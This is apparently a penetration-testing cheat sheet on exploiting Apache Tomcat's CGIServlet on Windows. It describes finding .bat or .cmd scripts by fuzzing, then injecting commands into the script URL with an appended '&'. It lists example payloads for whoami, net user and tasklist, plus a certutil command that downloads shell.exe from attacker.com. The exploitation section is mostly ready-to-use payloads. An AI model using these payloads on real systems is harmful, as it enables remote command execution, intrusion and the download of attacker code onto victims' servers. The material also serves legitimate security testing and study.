tomcat-cgi
Tomcat CGI
Tomcat CGI (Common Gateway Interface) is a feature in Apache Tomcat that allows the server to execute external scripts, such as Perl, Python, or shell scripts, in response to HTTP requests. This functionality enables dynamic content generation, similar to how traditional CGI works in other web servers like Apache HTTP Server. However, unlike servlets and JSP, CGI scripts run as separate processes, which can introduce performance overhead.
In Tomcat, CGI support is provided via the CGIServlet, which must be explicitly enabled in the web.xml configuration file. The servlet maps incoming requests to CGI scripts located in a specified directory, executing them and returning the output as an HTTP response. While this provides flexibility, it is generally discouraged due to security risks and inefficiency compared to modern alternatives like servlets, JSP, or frameworks such as Spring.
Enumeration
- We can hunt for Apache Tomcat on a server using Nmap output.
- Hunt for CGI scripts, which are normally located at
https://ip:port/cgi. We can then fuzz for/cgi/FUZZ.cmdor/cgi/FUZZ.bat, as we are targeting.bator.cmdfiles since this exploit is specifically for Windows.
Exploitation
- Locate the CGI script file, e.g.,
http://rezydev.xyz/cgi/script.bat. - Append
&followed by the command, e.g.,http://rezydev.xyz/cgi/script.bat?&dir, which lists directories.
We can use /cgi/script.bat?&set to look for environment variables. If the PATH variable isn’t set, we need to execute binaries by specifying the full path. For example:
C:\Windows\System32\whoami.exe– Identifies the current user.C:\Windows\System32\cmd.exe /c ipconfig– Displays network configuration.C:\Windows\System32\tasklist.exe– Lists running processes.C:\Windows\System32\net.exe user– Displays user accounts on the system.C:\Windows\System32\certutil.exe -urlcache -f http://attacker.com/shell.exe shell.exe– Downloads a file from a remote server.
Note: URL-Encode the payload if we get error.